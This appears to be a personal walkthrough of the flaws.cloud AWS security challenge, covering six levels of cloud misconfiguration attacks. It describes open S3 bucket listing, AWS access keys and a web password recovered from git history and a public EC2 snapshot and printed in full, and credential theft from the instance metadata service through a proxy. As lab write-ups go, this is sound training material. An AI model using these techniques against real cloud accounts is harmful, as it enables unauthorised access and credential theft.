Level #1

Figure 1 Level 1 Challenge flaws.cloud

I used nslookup to get DNS information of flaws.cloud:

Figure 2 nslookup flaws.cloud

After that, I used nslookup to reverse DNS lookup IP address 52.218.201.59 to find corresponding domain:

Figure 3 reverse DNS lookup IP 52.218.201.59

From reverse DNS lookup, I knew that flaws.cloud uses Amazon AWS S3 bucket in us-west-2 region. To explore the bucket content, I used AWS CLI:

Figure 4 explore s3 bucket of flaws.cloud using aws cli

In the picture above, we can see secret-dd02c7c.html file which is the secret file that I am looking for:

Figure 5 Found the secret file located in flaws.cloud/secret-dd02c7c.html

Level #2

Figure 6 Level 2 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

After configuring my profile in ~/.aws/credentials, I used AWS CLI to read the content of level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Figure 7 Content of level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

As seen in the picture above, the secret file name is secret-e4443fc.html. I then accessed the file using my web browser:

Figure 8 Secret file for level 2 can be accessed in level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html

Level #3

Figure 9 Level #3 Challenge level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Using AWS CLI, I listed the content of the S3 bucket and saw that there is a GIT folder.

Figure 10 Content of challenge 3 s3 bucket

Figure 11 Content of git directory inside challenge 3 s3 bucket

GIT directory ideally shouldn’t be put inside web directory and make accesible to everyone because sometimes it contains sensitive data, such as keys, source codes, configs, etc. To explore the GIT directory, I downloaded the whole S3 bucket into my laptop:

Figure 12 Downloading the s3 bucket

Figure 13 Downloaded s3 bucket content in my laptop

Running git log gave me a hint that the creator accidentally left sensitive data:

Figure 14 Hint from git log

After that, I run git checkout to see the content at the previous commit:

Figure 15 Git checkout to see content at the previous commit

I then examined the bucket content and saw that there is access_key.txt which contained aws access_key and secret_key: access_key AKIAJ366LIPB4IJKT7SA secret_access_key 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

Figure 16 I found the access_key and secret_key

I used the access_key to add a new AWS profile in my laptop:

Figure 17 Add a new aws profile

Using the newly added flaws profile in my laptop, I listed the flaws S3 bucket and found complete list of available buckets, especially the one that is used to host challenge 4:

Figure 17_1

Level #4

Figure 18 Level 4 Challenge

When I tried to access the web page, the web server asked me to enter a valid credential, which I didn’t have:

Figure 19 web page is protected

After that, I tried to get the account ID using flaw access key that I set before:

Figure 20 Getting account ID

Because I knew from the challenge description that there was an EC2 snapshot made, I tried to list EC2 snapshots owned by the user:

Figure 21 EC2 snapshots owned by the user

As seen in the picture above, there was a snapshot backup named: “flaws backup 2017.02.27”. To explore what is inside the snapshot, I used the snapshot to created volume in my AWS account:

Figure 22 Create a volume using the snapshot

After that, I launched an EC2 instance and attached the volume to the it:

Figure 23 Attach the volume to an EC2 instance

Connected to the instance using SSH:

Figure 24 Connected to the instance using SSH

And mounted the volume:

Figure 25 Mounted the volume

I finally able to get the web page inside www directory:

Figure 26 html file consisting the next level link level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

After exploring more, I also found the username and password used to access the web page:

Figure 27 username and password to access the web page username: flaws password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Succesfully accessed the web page using the username and password that I found:

Figure 28 Succesfully accessed the web page

Level #5

Figure 29 Level 5 Challenge

After learning how the proxy works, I used the proxy to access IP address 169.254.169.254 which is a special IP address that contains metadata:

Figure 30 Metadata stored in 169.254.169.254

After exploring, I found sensitive access_key, secret_access_key, and token:

Figure 31 I found sensitive metadata

After that, I configured a new profile named “level5” in AWS credential file inside my laptop:

Figure 32 Configured a new profile named “level5”

After that, as instructed, I listed the content of the level 6 bucket:

Figure 33 The content of level 6 bucket

Level #6

Figure 34 Level 6 Challenge

First, I added a new profile inside AWS credentials file in my laptop:

Figure 35 Added a new profile named level6

After that, I used AWS CLI to get username of the account:

Figure 36 I got the username of the account

And security policies attached to the user:

Figure 37 security policies attached to the account

I decided to explore more the list_apigateways policy which is not a default policies provided by AWS:

Figure 38 get more information to the policy

Figure 39 read the policy

The API Gateway in the policy above is used to call a lambda function. To learned how to invoke the function, I listed the available functions:

Figure 40 Available lambda functions named Level6

After that, I read the level6 lambda function policy:

Figure 41 Level6 lambda function policy

From the policy, I knew that I can execute the function and also informed me the rest-api-id. I then executed the command below to get stages of the the REST API:

Figure 42 get stages of the rest api

Using all the information that I have collected, I run the lambda function by accessing URL: s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Figure 43 Executing the lambda function

As seen in the picture above, the final URL is: theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/

Figure 44 The End of the challenges